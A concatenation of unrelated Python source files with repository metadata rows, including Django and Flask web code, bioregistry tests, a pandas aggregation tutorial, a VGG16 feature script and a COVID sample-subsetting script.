                ('name', models.CharField(max_length=100)),
                ('surname', models.CharField(max_length=100)),
                ('status', models.CharField(choices=[('not_in_search', 'Не ищу работу'), ('consideration', 'Рассматриваю предложения'), ('in_search', 'Ищу работу')], max_length=100)),
                ('salary', models.FloatField()),
                ('specialty', models.CharField(choices=[('frontend', 'Фронтенд'), ('backend', 'Бэкенд'), ('gamedev', 'Геймдев'), ('devops', 'Девопс'), ('design', 'Дизайн'), ('products', 'Продукты'), ('management', 'Менеджмент'), ('testing', 'Тестирование')], max_length=100)),
                ('grade', models.CharField(choices=[('intern', 'intern'), ('junior', 'junior'), ('middle', 'middle'), ('senior', 'senior'), ('lead', 'lead')], max_length=100)),
                ('education', models.CharField(choices=[('missing', 'Отсутствует'), ('secondary', 'Среднее'), ('vocational', 'Средне-специальное'), ('incomplete_higher', 'Неполное высшее'), ('higher', 'Высшее')], max_length=100)),
                ('experience', models.CharField(max_length=500)),
                ('portfolio', models.CharField(max_length=500)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='resume', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| 54.076923 | 141 | 0.556188 | 191 | 2,109 | 6.005236 | 0.570681 | 0.104621 | 0.062772 | 0.083697 | 0.094159 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035971 | 0.275012 | 2,109 | 38 | 142 | 55.5 | 0.714192 | 0.021337 | 0 | 0 | 1 | 0 | 0.235209 | 0.011154 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.09375 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
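The migration above defines several `CharField`s with `choices`, i.e. lists of `(stored_value, human_label)` pairs. A small sketch of what that mapping buys you — validation plus a display lookup, roughly what Django's field validation and `get_<field>_display()` provide (the English labels here are illustrative; the migration's real labels are Russian):

```python
# Hypothetical Django-style choices: (stored value, human-readable label)
GRADE_CHOICES = [
    ('intern', 'Intern'),
    ('junior', 'Junior'),
    ('middle', 'Middle'),
    ('senior', 'Senior'),
    ('lead', 'Lead'),
]

def validate_choice(value, choices):
    # Reject values outside the declared choices, like Django's field validation
    if value not in dict(choices):
        raise ValueError('%r is not a valid choice' % value)
    return value

def get_display(value, choices):
    # Map the stored value to its human-readable label
    return dict(choices)[value]

print(get_display(validate_choice('senior', GRADE_CHOICES), GRADE_CHOICES))  # -> Senior
```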
5766b267912e78674e78fd7d2805ec7078a5c543 | 4,072 | py | Python | tests/test_metaregistry.py | kkaris/bioregistry | e8cdaf8e8c5670873ce10a5a67d7850b76e5eff7 | [
"MIT"
] | null | null | null | tests/test_metaregistry.py | kkaris/bioregistry | e8cdaf8e8c5670873ce10a5a67d7850b76e5eff7 | [
"MIT"
] | null | null | null | tests/test_metaregistry.py | kkaris/bioregistry | e8cdaf8e8c5670873ce10a5a67d7850b76e5eff7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Tests for the metaregistry."""
import unittest
import bioregistry
from bioregistry.export.rdf_export import metaresource_to_rdf_str
from bioregistry.schema import Registry
class TestMetaregistry(unittest.TestCase):
"""Tests for the metaregistry."""
def test_minimum_metadata(self):
"""Test the metaregistry entries have a minimum amount of data."""
for metaprefix, registry_pydantic in bioregistry.read_metaregistry().items():
self.assertIsInstance(registry_pydantic, Registry)
data = registry_pydantic.dict()
with self.subTest(metaprefix=metaprefix):
self.assertIn('name', data)
self.assertIn('homepage', data)
self.assertIn('example', data)
self.assertIn('description', data)
# When a registry is a provider, it means it
# provides for its entries
self.assertIn('provider', data)
if data['provider']:
self.assertIn('provider_url', data)
self.assertIn('$1', data['provider_url'])
# When a registry is a resolver, it means it
# can resolve entries (prefixes) + identifiers
self.assertIn('resolver', data)
if data['resolver']:
self.assertIn('resolver_url', data)
self.assertIn('$1', data['resolver_url'])
self.assertIn('$2', data['resolver_url'])
invalid_keys = set(data).difference({
'prefix', 'name', 'homepage', 'download',
'provider', 'resolver', 'description', 'provider_url',
'example', 'resolver_url', 'contact',
})
self.assertEqual(set(), invalid_keys, msg='invalid metadata')
def test_get_registry(self):
"""Test getting a registry."""
self.assertIsNone(bioregistry.get_registry('nope'))
self.assertIsNone(bioregistry.get_registry_name('nope'))
self.assertIsNone(bioregistry.get_registry_homepage('nope'))
self.assertIsNone(bioregistry.get_registry_url('nope', ...))
self.assertIsNone(bioregistry.get_registry_example('nope'))
self.assertIsNone(bioregistry.get_registry_description('nope'))
self.assertIsNone(bioregistry.get_registry_url('n2t', ...)) # no provider available for N2T registry
metaprefix = 'uniprot'
registry = bioregistry.get_registry(metaprefix)
self.assertIsInstance(registry, Registry)
self.assertEqual(metaprefix, registry.prefix)
self.assertEqual(registry.description, bioregistry.get_registry_description(metaprefix))
homepage = 'https://www.uniprot.org/database/'
self.assertEqual(homepage, registry.homepage)
self.assertEqual(homepage, bioregistry.get_registry_homepage(metaprefix))
name = 'UniProt Cross-ref database'
self.assertEqual(name, registry.name)
self.assertEqual(name, bioregistry.get_registry_name(metaprefix))
example = '0174'
self.assertEqual(example, registry.example)
self.assertEqual(example, bioregistry.get_registry_example(metaprefix))
url = bioregistry.get_registry_url(metaprefix, example)
self.assertEqual('https://www.uniprot.org/database/DB-0174', url)
def test_resolver(self):
"""Test generating resolver URLs."""
# Can't resolve since nope isn't a valid registry
self.assertIsNone(bioregistry.get_registry_resolve_url('nope', 'chebi', '1234'))
# Can't resolve since GO isn't a resolver
self.assertIsNone(bioregistry.get_registry_resolve_url('go', 'chebi', '1234'))
url = bioregistry.get_registry_resolve_url('bioregistry', 'chebi', '1234')
self.assertEqual('https://bioregistry.io/chebi:1234', url)
def test_get_rdf(self):
"""Test conversion to RDF."""
s = metaresource_to_rdf_str('uniprot')
self.assertIsInstance(s, str)
| 43.319149 | 109 | 0.638507 | 423 | 4,072 | 6.004728 | 0.234043 | 0.073622 | 0.138583 | 0.106299 | 0.225197 | 0.179528 | 0.073228 | 0 | 0 | 0 | 0 | 0.009772 | 0.246071 | 4,072 | 93 | 110 | 43.784946 | 0.81759 | 0.123281 | 0 | 0 | 0 | 0 | 0.129105 | 0 | 0 | 0 | 0 | 0 | 0.557377 | 1 | 0.065574 | false | 0 | 0.065574 | 0 | 0.147541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
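`test_minimum_metadata` above checks that provider URLs contain a `$1` placeholder and resolver URLs contain both `$1` and `$2`. A sketch of how such positional placeholders could be expanded into concrete URLs — the `expand` helper is illustrative; bioregistry's own URL formatting may differ:

```python
def expand(template, *args):
    # Replace $1, $2, ... with the corresponding positional arguments
    for i, arg in enumerate(args, start=1):
        template = template.replace('$%d' % i, str(arg))
    return template

print(expand('https://bioregistry.io/$1:$2', 'chebi', '1234'))
# -> https://bioregistry.io/chebi:1234
```

A resolver template takes a prefix for `$1` and an identifier for `$2`, while a provider template like the UniProt one in `test_get_registry` only needs `$1`.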
57697b1541d35be66a3cab37aa617e895a535842 | 341 | py | Python | ex038.py | honeyhugh/PythonCurso | e5b8efe04e100ea0b0c0aacde1caf7ae52489f40 | [
"MIT"
] | null | null | null | ex038.py | honeyhugh/PythonCurso | e5b8efe04e100ea0b0c0aacde1caf7ae52489f40 | [
"MIT"
] | null | null | null | ex038.py | honeyhugh/PythonCurso | e5b8efe04e100ea0b0c0aacde1caf7ae52489f40 | [
"MIT"
] | null | null | null | print('Number analyzer')
print('=-=' * 15)
n1 = int(input('Enter the first number: '))
n2 = int(input('Enter the second number: '))
if n1 > n2:
    print('The number {} is greater than the number {}'.format(n1, n2))
elif n2 > n1:
    print('The number {} is greater than the number {}'.format(n2, n1))
else:
    print('The two values are equal.')
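The branching above can also be factored into a reusable function, which makes the comparison easy to test (a standalone sketch, not part of the course file):

```python
def compare(n1, n2):
    """Return a message describing which of the two numbers is greater."""
    if n1 > n2:
        return 'The number {} is greater than the number {}'.format(n1, n2)
    elif n2 > n1:
        return 'The number {} is greater than the number {}'.format(n2, n1)
    return 'The two values are equal.'

print(compare(3, 7))
```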
| 31 | 63 | 0.624633 | 55 | 341 | 3.872727 | 0.472727 | 0.131455 | 0.131455 | 0.140845 | 0.319249 | 0.319249 | 0.319249 | 0.319249 | 0.319249 | 0 | 0 | 0.043636 | 0.193548 | 341 | 10 | 64 | 34.1 | 0.730909 | 0 | 0 | 0 | 0 | 0 | 0.504399 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
576acce6fb8aee36735ff671a49a541abb4f2890 | 750 | py | Python | setup.py | ksachdeva/symbulate | 409188680c599622140ff6c984c95703173472e8 | [
"MIT"
] | 25 | 2017-04-04T01:55:22.000Z | 2022-03-28T17:57:49.000Z | setup.py | ksachdeva/symbulate | 409188680c599622140ff6c984c95703173472e8 | [
"MIT"
] | 67 | 2017-06-27T23:32:29.000Z | 2022-01-15T19:57:28.000Z | setup.py | ksachdeva/symbulate | 409188680c599622140ff6c984c95703173472e8 | [
"MIT"
] | 21 | 2017-04-04T01:55:22.000Z | 2022-01-11T20:03:52.000Z | from setuptools import setup, find_packages
setup(
name="symbulate",
version="0.5.5",
description="A symbolic algebra for specifying simulations.",
url="https://github.com/dlsun/symbulate",
author="Dennis Sun",
author_email="dsun09@calpoly.edu",
license="GPLv3",
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Education',
'Topic :: Scientific/Engineering :: Mathematics',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Programming Language :: Python :: 3',
],
keywords='probability simulation',
packages=find_packages(),
install_requires=[
'numpy',
'scipy',
'matplotlib'
]
)
| 22.058824 | 75 | 0.612 | 72 | 750 | 6.319444 | 0.847222 | 0.052747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017889 | 0.254667 | 750 | 33 | 76 | 22.727273 | 0.796064 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.029333 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
576cac074c13eb095065c6d2030dffe84a3c2e7c | 725 | py | Python | blind_automation/event/blocker.py | RaphiOriginal/blindAutomation | 47f087be0ef33983cfc372abe09760c9a64f1849 | [
"MIT"
] | 1 | 2020-08-20T19:43:14.000Z | 2020-08-20T19:43:14.000Z | blind_automation/event/blocker.py | RaphiOriginal/blindAutomation | 47f087be0ef33983cfc372abe09760c9a64f1849 | [
"MIT"
] | null | null | null | blind_automation/event/blocker.py | RaphiOriginal/blindAutomation | 47f087be0ef33983cfc372abe09760c9a64f1849 | [
"MIT"
] | null | null | null | from typing import List, Optional, TypeVar
from .event import EventBlocker
T = TypeVar('T')
class Blocker(EventBlocker):
    def __init__(self):
        self.__block = False
        self.__block_list: List[T] = []
def block(self):
self.__block = True
def unblock(self):
self.__block = False
def update(self, task: T):
self.__block_list.append(task)
@property
def last(self) -> Optional[T]:
if len(self.__block_list) > 0:
return self.__block_list.pop()
return None
@property
def blocking(self) -> bool:
return self.__block
def __repr__(self):
return 'Blocker: {blocking: %s, blocked: %s}' % (self.blocking, self.__block_list)
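`Blocker` keeps a LIFO backlog of blocked tasks: `update` pushes, `last` pops the most recent, returning `None` once drained. A self-contained sketch of the same semantics (the `EventBlocker` base is omitted, so this is illustrative only):

```python
class MiniBlocker:
    """Stripped-down stand-in for Blocker, without the EventBlocker base."""

    def __init__(self):
        self._blocking = False
        self._tasks = []

    def block(self):
        self._blocking = True

    def unblock(self):
        self._blocking = False

    def update(self, task):
        self._tasks.append(task)

    @property
    def blocking(self):
        return self._blocking

    @property
    def last(self):
        # Pop in LIFO order; None once the backlog is drained.
        return self._tasks.pop() if self._tasks else None

b = MiniBlocker()
b.block()
b.update('open')
b.update('close')
print(b.last)  # the most recently blocked task
```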
| 21.323529 | 90 | 0.609655 | 88 | 725 | 4.670455 | 0.386364 | 0.19708 | 0.158151 | 0.087591 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001901 | 0.274483 | 725 | 33 | 91 | 21.969697 | 0.779468 | 0 | 0 | 0.173913 | 0 | 0 | 0.051034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.304348 | false | 0 | 0.086957 | 0.086957 | 0.608696 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5777cb4aa061f3c293f389812b1b6779768ca886 | 890 | py | Python | CNN/VGGNET/vgg16_features.py | reddyprasade/Deep-Learning
| 35fea69af72f94f6ad62a0f308de7bd515c27e7a
| [
"MIT"
] | 15 | 2020-01-23T12:01:22.000Z | 2022-03-29T21:07:41.000Z | CNN/VGGNET/vgg16_features.py | reddyprasade/Deep-Learning
| 35fea69af72f94f6ad62a0f308de7bd515c27e7a
| [
"MIT"
] | null | null | null | CNN/VGGNET/vgg16_features.py | reddyprasade/Deep-Learning
| 35fea69af72f94f6ad62a0f308de7bd515c27e7a
| [
"MIT"
] | 10 | 2020-02-12T02:52:04.000Z | 2021-07-04T07:38:39.000Z | import tensorflow as tf
from tensorflow.keras.applications.vgg16 import VGG16
from tensorflow.keras import models
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.vgg16 import preprocess_input
import numpy as np
# prebuild model with pre-trained weights on imagenet
base_model = VGG16(weights='imagenet', include_top=True)
print(base_model)
for i, layer in enumerate(base_model.layers):
    print(i, layer.name, layer.output_shape)
# extract features from block4_pool block
model = models.Model(inputs=base_model.input,
outputs=base_model.get_layer('block4_pool').output)
img_path = 'cat.jpg'
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
# get the features from this block
features = model.predict(x)
print(features)
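The `features` array returned by `model.predict` is usually flattened into a vector before being compared or fed to a downstream model. A pure-Python cosine-similarity helper for such vectors (illustrative only; in practice this would be done with NumPy on the prediction output):

```python
import math

def cosine_similarity(a, b):
    """Cosine similarity between two equal-length feature vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

# Parallel vectors have similarity 1.0; orthogonal vectors have 0.0.
print(cosine_similarity([1.0, 0.0, 2.0], [2.0, 0.0, 4.0]))
```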
| 30.689655 | 65 | 0.769663 | 134 | 890 | 4.970149 | 0.477612 | 0.067568 | 0.114114 | 0.093093 | 0.126126 | 0.126126 | 0 | 0 | 0 | 0 | 0 | 0.023529 | 0.140449 | 890 | 28 | 66 | 31.785714 | 0.847059 | 0.139326 | 0 | 0 | 0 | 0 | 0.035471 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.35 | 0 | 0.35 | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
577c1794e9fcb7bdccc6a2a9158ce5b0867f7053 | 4,230 | py | Python | notebook/pandas_agg.py | vhn0912/python-snippets | 80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038 | [
"MIT"
] | 174 | 2018-05-30T21:14:50.000Z | 2022-03-25T07:59:37.000Z | notebook/pandas_agg.py | vhn0912/python-snippets | 80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038 | [
"MIT"
] | 5 | 2019-08-10T03:22:02.000Z | 2021-07-12T20:31:17.000Z | notebook/pandas_agg.py | vhn0912/python-snippets | 80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038 | [
"MIT"
] | 53 | 2018-04-27T05:26:35.000Z | 2022-03-25T07:59:37.000Z | import pandas as pd
import numpy as np
print(pd.__version__)
# 1.0.0
print(pd.DataFrame.agg is pd.DataFrame.aggregate)
# True
df = pd.DataFrame({'A': [0, 1, 2], 'B': [3, 4, 5]})
print(df)
# A B
# 0 0 3
# 1 1 4
# 2 2 5
print(df.agg(['sum', 'mean', 'min', 'max']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
# min 0.0 3.0
# max 2.0 5.0
print(type(df.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg(['sum']))
# A B
# sum 3 12
print(type(df.agg(['sum'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg('sum'))
# A 3
# B 12
# dtype: int64
print(type(df.agg('sum')))
# <class 'pandas.core.series.Series'>
print(df.agg({'A': ['sum', 'min', 'max'],
'B': ['mean', 'min', 'max']}))
# A B
# max 2.0 5.0
# mean NaN 4.0
# min 0.0 3.0
# sum 3.0 NaN
print(df.agg({'A': 'sum', 'B': 'mean'}))
# A 3.0
# B 4.0
# dtype: float64
print(df.agg({'A': ['sum'], 'B': ['mean']}))
# A B
# mean NaN 4.0
# sum 3.0 NaN
print(df.agg({'A': ['min', 'max'], 'B': 'mean'}))
# A B
# max 2.0 NaN
# mean NaN 4.0
# min 0.0 NaN
print(df.agg(['sum', 'mean', 'min', 'max'], axis=1))
# sum mean min max
# 0 3.0 1.5 0.0 3.0
# 1 5.0 2.5 1.0 4.0
# 2 7.0 3.5 2.0 5.0
s = df['A']
print(s)
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(s.agg(['sum', 'mean', 'min', 'max']))
# sum 3.0
# mean 1.0
# min 0.0
# max 2.0
# Name: A, dtype: float64
print(type(s.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.series.Series'>
print(s.agg(['sum']))
# sum 3
# Name: A, dtype: int64
print(type(s.agg(['sum'])))
# <class 'pandas.core.series.Series'>
print(s.agg('sum'))
# 3
print(type(s.agg('sum')))
# <class 'numpy.int64'>
print(s.agg({'Total': 'sum', 'Average': 'mean', 'Min': 'min', 'Max': 'max'}))
# Total 3.0
# Average 1.0
# Min 0.0
# Max 2.0
# Name: A, dtype: float64
# print(s.agg({'NewLabel_1': ['sum', 'max'], 'NewLabel_2': ['mean', 'min']}))
# SpecificationError: nested renamer is not supported
print(df.agg(['mad', 'amax', 'dtype']))
# A B
# mad 0.666667 0.666667
# amax 2 5
# dtype int64 int64
print(df['A'].mad())
# 0.6666666666666666
print(np.amax(df['A']))
# 2
print(df['A'].dtype)
# int64
# print(df.agg(['xxx']))
# AttributeError: 'xxx' is not a valid function for 'Series' object
# print(df.agg('xxx'))
# AttributeError: 'xxx' is not a valid function for 'DataFrame' object
print(hasattr(pd.DataFrame, '__array__'))
# True
print(hasattr(pd.core.groupby.GroupBy, '__array__'))
# False
print(df.agg([np.sum, max]))
# A B
# sum 3 12
# max 2 5
print(np.sum(df['A']))
# 3
print(max(df['A']))
# 2
print(np.abs(df['A']))
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(df.agg([np.abs]))
# A B
# absolute absolute
# 0 0 3
# 1 1 4
# 2 2 5
# print(df.agg([np.abs, max]))
# ValueError: cannot combine transform and aggregation operations
def my_func(x):
return min(x) / max(x)
print(df.agg([my_func, lambda x: min(x) / max(x)]))
# A B
# my_func 0.0 0.6
# <lambda> 0.0 0.6
print(df['A'].std())
# 1.0
print(df['A'].std(ddof=0))
# 0.816496580927726
print(df.agg(['std', lambda x: x.std(ddof=0)]))
# A B
# std 1.000000 1.000000
# <lambda> 0.816497 0.816497
print(df.agg('std', ddof=0))
# A 0.816497
# B 0.816497
# dtype: float64
print(df.agg(['std'], ddof=0))
# A B
# std 1.0 1.0
df_str = df.assign(C=['X', 'Y', 'Z'])
print(df_str)
# A B C
# 0 0 3 X
# 1 1 4 Y
# 2 2 5 Z
# df_str['C'].mean()
# TypeError: Could not convert XYZ to numeric
print(df_str.agg(['sum', 'mean']))
# A B C
# sum 3.0 12.0 XYZ
# mean 1.0 4.0 NaN
print(df_str.agg(['mean', 'std']))
# A B
# mean 1.0 4.0
# std 1.0 1.0
print(df_str.agg(['sum', 'min', 'max']))
# A B C
# sum 3 12 XYZ
# min 0 3 X
# max 2 5 Z
print(df_str.select_dtypes(include='number').agg(['sum', 'mean']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
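The dict form of `agg` demonstrated above dispatches each named function over each requested column. A pure-Python sketch of that dispatch, assuming columns stored as plain lists (illustrative only, not how pandas implements it):

```python
def mini_agg(columns, spec):
    """columns: {name: list of values}; spec: {name: list of function names}."""
    funcs = {'sum': sum, 'min': min, 'max': max,
             'mean': lambda v: sum(v) / len(v)}
    # Apply each requested function to its column, keyed by function name.
    return {col: {f: funcs[f](columns[col]) for f in wanted}
            for col, wanted in spec.items()}

data = {'A': [0, 1, 2], 'B': [3, 4, 5]}
print(mini_agg(data, {'A': ['sum', 'min', 'max'], 'B': ['mean']}))
```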
| 18.883929 | 77 | 0.513002 | 746 | 4,230 | 2.875335 | 0.131367 | 0.091375 | 0.083916 | 0.036364 | 0.49324 | 0.393007 | 0.356177 | 0.296037 | 0.234033 | 0.179021 | 0 | 0.103471 | 0.271158 | 4,230 | 223 | 78 | 18.96861 | 0.59228 | 0.520567 | 0 | 0 | 0 | 0 | 0.136411 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019231 | false | 0 | 0.038462 | 0.019231 | 0.076923 | 0.846154 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
57844212fa28ebcdefb93bfed459606ee05dd39b | 2,950 | py | Python | Prototype_2/web/blueprints/index.py | amal66/Kawm | 3bf442ea1f4b572f4ec840e0ee6ec7d96ae23133 | [
"MIT"
] | null | null | null | Prototype_2/web/blueprints/index.py | amal66/Kawm | 3bf442ea1f4b572f4ec840e0ee6ec7d96ae23133 | [
"MIT"
] | null | null | null | Prototype_2/web/blueprints/index.py | amal66/Kawm | 3bf442ea1f4b572f4ec840e0ee6ec7d96ae23133 | [
"MIT"
] | null | null | null | from flask import Blueprint, render_template, redirect, url_for, request, flash, make_response
from flask import current_app as app
from flask_login import (
LoginManager,
current_user,
login_required,
login_user,
logout_user,
UserMixin,
)
from ..models import User, db
from ..security import hash_string
from datetime import datetime
index_template = Blueprint('index', __name__, template_folder='../templates', static_folder='../static')
# Display home page based on authentication status
@index_template.route('/', methods=["GET","POST"])
def index():
'''
Display home page based on authentication status.
'''
if current_user.is_authenticated:
return render_template('mainpage.html', name=current_user.name, email=current_user.email)
else:
if request.method == 'POST':
email = request.form.get('InputEmail')
password = request.form.get('InputPassword')
remember_me = request.form.get('Remember_me')
user_details = User.query.filter_by(email=email).first()
if user_details:
hashed_password = str(hash_string(password))
if hashed_password == user_details.password:
login_user(user_details)
resp = make_response(render_template('mainpage.html', name=user_details.name, email=user_details.email))
if remember_me == 'on':
COOKIE_TIME_OUT = 60*60*24*7
resp.set_cookie('email',email, max_age=COOKIE_TIME_OUT)
resp.set_cookie('password',password, max_age=COOKIE_TIME_OUT)
resp.set_cookie('rem', 'on', max_age=COOKIE_TIME_OUT)
else:
resp = make_response(redirect('/'))
resp.set_cookie('email', '', expires = datetime.now(), max_age = 0)
resp.set_cookie('password', '', expires = datetime.now(), max_age = 0)
resp.set_cookie('rem', 'off', expires = datetime.now(), max_age = 0)
return resp
else:
if user_details.password == str(hash_string('google')):
flash('Please login with Google login')
elif user_details.password == str(hash_string('facebook')):
flash('Please login with Facebook login')
else:
flash('Incorrect Password')
return redirect(url_for('index.index'))
else:
flash('User not found')
return redirect(url_for('index.index'))
                # Tell them no such user was found
else:
print(request.cookies)
return render_template('index.html')
| 43.382353 | 124 | 0.557288 | 308 | 2,950 | 5.12013 | 0.311688 | 0.055802 | 0.049461 | 0.039949 | 0.28662 | 0.236525 | 0.142042 | 0.088776 | 0.048193 | 0 | 0 | 0.00516 | 0.343051 | 2,950 | 67 | 125 | 44.029851 | 0.808566 | 0.043051 | 0 | 0.148148 | 0 | 0 | 0.099109 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018519 | false | 0.148148 | 0.111111 | 0 | 0.222222 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
57885b1f14f79ac4171cf51a11ef29a2c3dc1503 | 4,232 | py | Python | utils/make_temporal_subsets.py | davidhwyllie/findNeighbour4 | d42e10711e59e93ebf0e798fbb1598929f662c9c | [
"MIT"
] | null | null | null | utils/make_temporal_subsets.py | davidhwyllie/findNeighbour4 | d42e10711e59e93ebf0e798fbb1598929f662c9c | [
"MIT"
] | 14 | 2021-11-26T14:43:25.000Z | 2022-03-22T00:39:17.000Z | utils/make_temporal_subsets.py | davidhwyllie/findNeighbour4 | d42e10711e59e93ebf0e798fbb1598929f662c9c | [
"MIT"
] | null | null | null | """ generates lists of SARS-CoV-2 samples which occurred before a particular date
Also generates a dictionary of reference compressed sequences
And a subset of these
Together, these can be passed to a ram_persistence object which
can be used instead of an fn3persistence object to test the performance of PCA, or for other
unit testing purposes.
Also useful for investigating how PCA detected the ingress of new strains over time.
Uses public cog metadata downloaded from COG-UK 7/4/2021, saved in
testdata/pca/cog_metadata.csv.gz, and requires access to an fn3persistence object containing the same data.
To run:
pipenv run python3 utils/make_temporal_subsets.py
"""
import os
import pandas as pd
import datetime
import gzip
import pickle
import progressbar
import random
from findn.mongoStore import fn3persistence
from findn.common_utils import ConfigManager
# open connection to existing covid datastore
config_file = os.path.join("demos", "covid", "covid_config_v3.json")
cfm = ConfigManager(config_file)
CONFIG = cfm.read_config()
PERSIST = fn3persistence(dbname=CONFIG["SERVERNAME"], connString=CONFIG["FNPERSISTENCE_CONNSTRING"], debug=CONFIG["DEBUGMODE"])
inputfile = "/data/software/fn4dev/testdata/pca/cog_metadata.csv.gz"
outputdir = "/data/data/pca/subsets" # or wherever
# get samples which are in server
extant_sample_ids = PERSIST.guids()
print("There are {0} samples in the server".format(len(extant_sample_ids)))
# read metadata file into pandas
with gzip.open(inputfile, "rt") as f:
df = pd.read_csv(f)
# we are using the middle part of the cog_id as the sample name as the sample_id; extract this.
sample_ids = df["sequence_name"].to_list()
df["sample_id"] = [x.split("/")[1] for x in sample_ids]
print("There are {0} samples in the COG-UK list".format(len(df.index)))
# what is in the server & not in the list?
server_sample_ids = set(extant_sample_ids)
inputfile_sample_ids = set(df['sample_id'])
missing = server_sample_ids - inputfile_sample_ids
print("Missing samples: n=", len(missing))
missing_df = pd.DataFrame({'missing': list(missing)})
print(missing_df)
missing_df.to_csv("/data/data/inputfasta/missing_meta.csv")
# load a small subset of the reference compressed sequences, for testing purposes
# load the reference compressed sequences
print("Dumping 5,000 sample test set")
storage_dict = {}
sampled = random.sample(df["sample_id"].to_list(), 5000)
bar = progressbar.ProgressBar(max_value=len(sampled))
print("Dumping all samples")
for i, sample_id in enumerate(sampled):
res = PERSIST.refcompressedsequence_read(sample_id)
bar.update(i)
storage_dict[sample_id] = res
bar.finish()
# write out the dictionary
outputfile = "/data/software/fn4dev/testdata/pca/seqs_5000test.pickle"
with open(outputfile, "wb") as f:
pickle.dump(storage_dict, f)
outputfile = "/data/software/fn4dev/testdata/pca/seqs_5000test_ids.pickle"
with open(outputfile, "wb") as f:
pickle.dump(sampled, f)
# load the reference compressed sequences
storage_dict = {}
bar = progressbar.ProgressBar(max_value=len(df.index))
for i, sample_id in enumerate(df["sample_id"]):
res = PERSIST.refcompressedsequence_read(sample_id)
bar.update(i)
storage_dict[sample_id] = res
bar.finish()
# write out the dictionary
outputfile = os.path.join(outputdir, "seqs_20210421.pickle")
with open(outputfile, "wb") as f:
pickle.dump(storage_dict, f)
# construct counts between 1 June 2020 and end March 2021
cnts = df.groupby(["sample_date"]).size()
cnts = cnts[cnts.index >= "2020-06-01"]
cnts = cnts[cnts.index < "2021-04-01"]
cnts = pd.DataFrame(cnts)
cnts.columns = ["count"]
